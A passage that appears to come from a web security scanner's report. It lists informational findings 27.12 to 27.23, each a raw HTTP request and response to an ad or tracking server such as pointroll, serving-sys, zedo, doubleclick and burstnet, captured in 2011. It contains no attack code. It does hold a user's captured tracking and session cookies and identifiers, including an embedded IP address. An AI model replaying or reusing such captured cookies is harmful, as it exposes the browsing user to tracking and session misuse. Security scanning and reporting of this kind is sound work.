GET /PortalServe/?pid=1188614T19920110117205515&cid=1478425&pos=h&redir=http://ad.doubleclick.net/click%3Bh=v8/3b26/3/0/*/v%3B242169367%3B0-0%3B3%3B39555935%3B3454-728/90%3B40388893/40406680/1%3Bu=!category-games|pos-atf|tag-adj|mtype-standard|sz-728x90|tile-2|demo-D|demo-T|demo-5840|demo-2966|demo-2907|demo-2905|demo-2904|demo-1607|demo-1299|demo-850|demo-848|demo-844|demo-827|demo-790|demo-777|demo-775|demo-774%3B~aopt=2/1/c6a3/0%3B~sscs=%3F$CTURL$&time=1|19:19|-5&r=0.015173257561400533&flash=10&server=polRedir HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=075575AC-65DD-4BD6-BEE2-9CADDD88EAC7; PRbu=Eo1TOtJ24; PRvt=CFJZfEo8h4CIqb!BVBBeJraEo5HX15xKAfDBCeJozEpECIv30c!BdBBeJujEo9GZf8jc!LQBEeJwvEpZYTFEeMAI_BAe; PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B; PRimp=96A50400-1413-8C47-0309-C2F0023E0100; PRca=|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#; PRcp=|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#; PRpl=|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#; PRcr=|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#; PRpc=|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 14 Jun 2011 00:19:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 7965
Set-Cookie:PRgo=BBBAAuILCBVCFUE6C.BZm.!B!B;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=A0A50400-79FC-2CEB-0209-123004DD0100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AJfR*19:2|AKYt*1093:1|AKRf*443:19|AKTh*396:1|AKKy*396:1|AKZ2*74:1|AKWd*1774:1|AKVe*981:1|AKQh*130:27|AKVX*396:1|AKTY*34573:2|AKKi*16228:2|AKAt*1646:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AJfRAAAT:2|AKYtAARd:1|AKRfAAHJ:19|AKThAAGY:1|AKKyAAGY:1|AKZ2AABM:1|AKQhAGKI:5|AKWdAA2c:1|AKVeAAPp:1|AKQhAACG:22|AKVXAAGY:1|AKTYAIzd:2|AKKiAENk:2|AKAtAA08:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|EzNM:2|F5NJ:1|F9VY:19|FX36:1|F2V4:1|FYoZ:2|FYo0:2|F5QS:1|FYoV:1|F10u:1|F2ym:1|FYnn:5|FYnm:10|FYnl:7|FY5B:1|F0tY:1|F0tZ:1|FQvS:2|FB4h:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GMb9:2|GOLI:1|GKRu:19|GLnt:1|GMuF:1|GK5Q:1|GOWw:1|GMWF:1|GNEj:1|GMEm:1|GK5V:2|GK5Z:2|GK5W:1|GMEn:2|GMEb:1|GMEa:2|GK5Y:3|GK5P:2|GMEZ:10|GMFk:1|GMyK:1|GMSZ:1|GKiO:2|GBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|EzNMGMb9:2|F5NJGOLI:1|F9VYGKRu:19|FX36GLnt:1|F2V4GMuF:1|FYo0GK5Q:1|FYoZGMEZ:2|FYo0GK5Z:1|F5QSGOWw:1|FYoVGMEZ:1|F10uGMWF:1|F2ymGNEj:1|FYnmGMEm:1|FYnmGK5V:2|FYnnGK5Z:1|FYnnGK5W:1|FYnnGMEn:2|FYnnGMEb:1|FYnmGMEa:2|FYnmGK5Y:3|FYnmGK5P:2|FYnlGMEZ:7|FY5BGMFk:1|F0tYGMyK:1|F0tZGMSZ:1|FQvSGKiO:2|FB4hGBnW:2|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

<script language='javascript' src='http://spd.pointroll.com/PointRoll/Ads/prWriteCode.js'></script><script language='javascript'>var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=functi
...[SNIP]...
27.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2713133&PluID=0&e=0&w=300&h=250&ord=3138287&ifrm=1&ucm=true&ifl=$$/static_html_files/addineyeV2.html$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3b26/3/0/%2a/i%3B239895957%3B0-0%3B0%3B15527176%3B4307-300/250%3B42522129/42539916/1%3B%3B%7Eokv%3D%3B%3Bs%3D8_10001%3Bmc%3Db2pfreezone%3Btile%3D6%3Bsz%3D336x280%2C300x250%3B%3Bbsg%3D122689%3Bbsg%3D122690%3B%3B%7Eaopt%3D2/1/ff/1%3B%7Esscs%3D%3f$$&z=39 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_front;;s=8_10001;mc=b2pfreezone;tile=6;sz=336x280,300x250;ord=4904490449044904;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; u2=d61a92e1-c563-4003-b380-e6f0a9dbf9f63I308g; A3=jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnu035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jAsGaPj002WG00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+afDX0000000002uK990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=le30aXzt06hH00002jDClaTYi0cbS00001kkgaaRpa038X00001hITfaPj402WG00001jkozaUUI0c7w00001kfxTaPj40aLz00001iWmhaSED0cb100001jNtbaUUO09sO00000kfL6aPj30aLz00001htTqaPvL02WG00001jmdWaRBM0c7w00001jDDbaTYi0cbS00001kWgdaUUO09SF00001iOnPaUUK03sY00001kDFiaPj408HF00001kDBSaRp908HF00001jxYWaUMm0bn800001kMmAaPj208B400001jpQXaRwv05qO00001kHfhaPj302WG00001hWjPaRu109wy00002jDDnaUUx0cbS00001iOpqaUUK03sY00001jkncaRBL0c7w00001jBrJaXnt035P00001kSTxaRuU06yP00001jA0ZaPj206hH00001kGfMaPj208HF00002jkpdaPj30c7w00001jNtfaUUK09sO00000kCKXaXnm08HG00001kQ2WaUUO0dKm00001kZ5yaTDK07Y700001kDAVaRp908HF00001kMqaaPj302WG00001kEncaRLI0alG00001iBmTaRqF08te00001kHhnaUnJ02WG00001kMnvaPj008B400001kcLvaUUK0dCb00001; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8Vlw0000000001u+a9iq0000000001uQ9j0T0000000001u+990p0000000001v59ZD90000000001uQ9fOC0000000002uK8nlR0000000001uK9cm20000000001uTalVe0000000001u+amoJ0000000002v5a0fG0000000001uZ8DfZ0000000001uKajUW0000000001u+89+70000000001uQahIj0000000001uK9XzA0000000001u+93LT0000000001uQ9i8d0000000001uKahI50000000001uK84hR0000000002uQ9xux0000000001uXa9it0000000001uQ9i8b0000000001uK9D2u0000000000u+9X5M0000000001uW8DfJ0000000001uK9iQ70000000002uQ9D2y0000000000u+9xuy0000000001uX7dOu0000000001uY9XJ40000000001uR9gvS0000000001uKa9j40000000001uK9v4a0000000001uK90mq0000000001v59gvT0000000001uK7dYp0000000001uK9qZf0000000001uQ9xup0000000001u+8Vlx0000000001u+; expires=Sun, 11-Sep-2011 20:13:56 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:55 GMT
Connection: close
Content-Length: 2180

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
27.13. http://d3.zedo.com/jsc/d3/ff2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /jsc/d3/ff2.html

Request

GET /jsc/d3/ff2.html?n=1219;c=19/1;w=300;h=250;d=9;s=1;q=ALEXA_core HTTP/1.1
Host: d3.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.alexa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=lYrOTcGt89Yz1ao6zwEmLiof~051411; __qca=P0-1637156077-1305746709690; PI=h478907Za945899Zc305005528,305005528Zs1410Zt1141; ZCBC=1; ZFFAbh=879B826,20|120_879#365; FFChanCap=1595B496,121#543485#876543#675101#543481#675099:305,5528#945899:1190,1#751892#675820,2#955819|0,1,1:1,1,1:14,1,1:0,1,1:2,1,1:0,7,1:0,33,4:1,30,1:0,30,1; FFgeo=2241452; FFCap=1595B305,201787:933,196008,139660:1219,217400|0,13,1:0,30,1:0,30,1:0,30,1; FFcat=1219,48,15:826,276,14:1190,1,14:933,56,15:826,501,14:1190,2,14; FFad=0:2:2:1:0:0

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 01 Jun 2011 12:17:16 GMT
ETag: "22020f4-a4c-4a4a5804e0b00"
Vary: Accept-Encoding
Server: ZEDO 3G
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 2636
Cache-Control: max-age=133466
Expires: Wed, 15 Jun 2011 13:32:42 GMT
Date: Tue, 14 Jun 2011 00:28:16 GMT
Connection: close

<!-- Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. -->
<html>
<head>
<script language="JavaScript">
var q2=new Image();var zzblist=new Array();var zzllist=new Array();var zzl;var zzStart=new
...[SNIP]...
27.14. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Request

GET /activityi;src=490793;type=conte003;cat=techc454;ord=6309225135482.848? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 14 Jun 2011 00:14:01 GMT
Expires: Tue, 14 Jun 2011 00:14:01 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 194
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"></body></html>
27.15. http://fluxstatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fluxstatic.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: fluxstatic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: f002
SId: pCdn
Date: Tue, 14 Jun 2011 00:29:26 GMT
Content-Length: 11

Bad Request
27.16. http://now.eloqua.com/visitor/v200/svrGP.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /visitor/v200/svrGP.asp

Request

GET /visitor/v200/svrGP.asp?pps=3&siteid=577&ref2=elqNone&tzo=360&ms=224 HTTP/1.1
Host: now.eloqua.com
Proxy-Connection: keep-alive
Referer: http://www.pega.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ELOQUA=GUID=3FED00B3830C43E6A35A88AB0C1B4136; ELQSTATUS=OK; __utmz=16459234.1306359787.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _jsuid=2150246959903343989; __utma=16459234.18880641.1306359787.1306377949.1306389346.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 14 Jun 2011 12:27:59 GMT
Content-Length: 49

GIF89a...................!.......,...........T..;
27.17. http://platform.twitter.com/widgets/follow_button.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform.twitter.com
Path:   /widgets/follow_button.html

Request

GET /widgets/follow_button.html?screen_name=WSJ&show_count=false&show_screen_name=true HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/page/news-tech-technology.html?refresh=on
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 03 Jun 2011 23:19:47 GMT
ETag: "316d5be7b9bf187a7b426f66963a909a"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 30500
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Date: Tue, 14 Jun 2011 00:13:51 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html><html><head><meta charset="utf-8"><title>Twitter For Websites: Follow Button</title><link rel="profile" href="http://microformats.org/profile/hcard"><style type="text/css">html{margin:0
...[SNIP]...
27.18. http://platform0.twitter.com/widgets/follow_button.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://platform0.twitter.com
Path:   /widgets/follow_button.html

Request

GET /widgets/follow_button.html?_=1306352834909&button=blue&id=twitter_tweet_button_0&lang=en&link_color=&screen_name=mtv&show_count=false&show_screen_name=false&text_color= HTTP/1.1
Host: platform0.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=43838368.1305663457.3.2.utmcsr=kosmix.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=43838368.1598605414.1305368954.1306579970.1306582526.7; k=173.193.214.243.1307962966384201

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 03 Jun 2011 23:19:47 GMT
ETag: "316d5be7b9bf187a7b426f66963a909a"
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 30500
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"
Date: Tue, 14 Jun 2011 00:16:15 GMT
Connection: close
P3P: CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html><html><head><meta charset="utf-8"><title>Twitter For Websites: Follow Button</title><link rel="profile" href="http://microformats.org/profile/hcard"><style type="text/css">html{margin:0
...[SNIP]...
27.19. http://static0.fluxstatic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static0.fluxstatic.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: static0.fluxstatic.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Length: 35
Content-Type: text/html
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2599960
Date: Tue, 14 Jun 2011 00:29:18 GMT
Connection: close
Vary: Accept-Encoding

404 - File or directory not found
27.20. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

Request

GET /cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/game/play.jhtml?arcadeGameId=10325912
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; /VTS.12067=2ujLG.yIpQ; /ad21868.12067=,CFC,GFC; /SO=:463:; /ad21868.12106=,CFC,GFC; /PC=2; /SC=2-33A.2

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:19:27 GMT
Content-Length: 137
Connection: close
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: /PC=3; path=/; expires=Tue, 21-Jun-2011 00:19:26 GMT
Set-Cookie: /SC=3-33A.3; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

27.21. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

Request

GET /cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/shows/teen_wolf/series.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; /VTS.12067=2ujLG.yIpQ; /ad21868.12067=,CFC,GFC; /ad21868.12106=,CFC,GFC; /SO=:463:; /PC=1; /SC=1-33A.1

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:18:14 GMT
Content-Length: 137
Connection: close
Set-Cookie: /ad21868.12106=,CFC,GFC; path=/
Set-Cookie: /PC=2; path=/; expires=Tue, 21-Jun-2011 00:18:13 GMT
Set-Cookie: /SC=2-33A.2; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=379297/site=mtv.mtvi/aamsz=728x90\"></SCR'+'IPT>');

27.22. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

Request

GET /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3CbhLH0eE71Hn7nncNGs58ZzJ-iRGtORm29qwWhWLJGJgcvEZ9HqbVw; TID=16vda0204fei8g; /SO=:463:; /ad21868.12106=,CFC,GFC; /PC=3; /SC=3-33A.3; /VTS.12067=2ujXm.pD3Q; /ad21868.12067=,CFC,GFC

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Tue, 14 Jun 2011 00:28:12 GMT
Content-Length: 138
Connection: close
Set-Cookie: /ad21868.11567=,CFC,GFC; path=/
Set-Cookie: /PC=4; path=/; expires=Tue, 21-Jun-2011 00:28:12 GMT
Set-Cookie: /SC=4-33A.3^2vc.1; path=/


document.write('<SCR'+'IPT SRC="http://viacom.adbureau.net/jserver/acc_random=374650/site=mtv.mtvi/aamsz=300x250\"></SCR'+'IPT>');

27.23. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

Request

GET /cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
